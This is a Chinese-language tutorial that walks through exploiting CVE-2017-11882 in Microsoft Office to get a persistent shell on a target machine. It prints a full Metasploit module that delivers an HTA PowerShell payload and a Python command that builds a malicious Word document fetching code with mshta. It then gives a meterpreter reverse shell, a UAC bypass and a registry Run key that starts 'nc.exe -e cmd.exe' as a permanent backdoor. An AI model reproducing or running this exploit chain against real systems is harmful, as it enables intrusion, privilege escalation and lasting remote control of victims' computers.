利用CVE-2017-11882拿到持久性shell
利用CVE-2017-11882拿到持久性shell
近日微软又爆出一个严重漏洞,利用该漏洞可以直接拿到目标机shell。这么好玩的东西怎么能错过了,于是搭建环境复现了一把。
首先去GitHub上下载exp https://github.com/starnightcyber/CVE-2017-11882.git
这里直接贴上exp脚本
把下面这段代码复制到usr/share/metasploit-framework/modules/exploits/windows/office/ 名字随意格式为.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft Office Payload Delivery',
'Description' => %q{
This module generates an command to place within
a word document, that when executed, will retrieve a HTA payload
via HTTP from an web server. Currently have not figured out how
to generate a doc.
},
'License' => MSF_LICENSE,
'Arch' => ARCH_X86,
'Platform' => 'win',
'Targets' =>
[
['Automatic', {} ],
],
'DefaultTarget' => 0,
))
end
def on_request_uri(cli, _request)
print_status("Delivering payload")
p = regenerate_payload(cli)
data = Msf::Util::EXE.to_executable_fmt(
framework,
ARCH_X86,
'win',
p.encoded,
'hta-psh',
{ :arch => ARCH_X86, :platform => 'win '}
)
send_response(cli, data, 'Content-Type' => 'application/hta')
end
def primer
url = get_uri
print_status("Place the following DDE in an MS document:")
print_line("mshta.exe \"#{url}\"")
end
end
打开msf,输入下列命令
use exploit/windows/office/CVE-2017-11882
set payload windows/meterpreter/reverse_tcp
show options 看一下需要设置哪些参数
这里我们设置一下LHOST和URIPATH就可以了,其他的用默认的即可。
LHOST就是kali 的ip URIPATH 是受害机连接的路径默认是遗传随机数,因为攻击脚本有字数限制所以我们改成123尽量减小长度。
设置好这些后就可以执行了。
输入 exploit -j
然后
在kali任意目录下gitclone https://github.com/starnightcyber/CVE-2017-11882.git
下好python脚本,在此目录下打开一个命令终端
输入下列命令,生成恶意文档
python Command_CVE-2017-11882.py -c "mshta http://ip/123" -o test.doc
Kali 开启Apache 靶机连接kali并下载恶意文档
靶机运行恶意文档
拿到meterpreter shell
getsystem 发现不是系统权限,因为Windows的UAC 保护机制
接下来我们利用kali自带的模块绕过UAC
use exploit/windows/local/bypassuac
set payload windows/meterpreter/reverse_tcp
一样的show options
set sessions
set lhost
set lport
exploit –j
获得一个新的sessions
利用刚获得的session 2 可以看到已经是系统管理员权限了
现在想干什么就干什么
我们就传一个nc修改一下注册表设置开机自启来获得一个永久后门吧。
在meterpreter下输入以下命令
upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe'
重启靶机在kali里输入
nc ip 444
成功拿到cmd shell
本次实验到此结束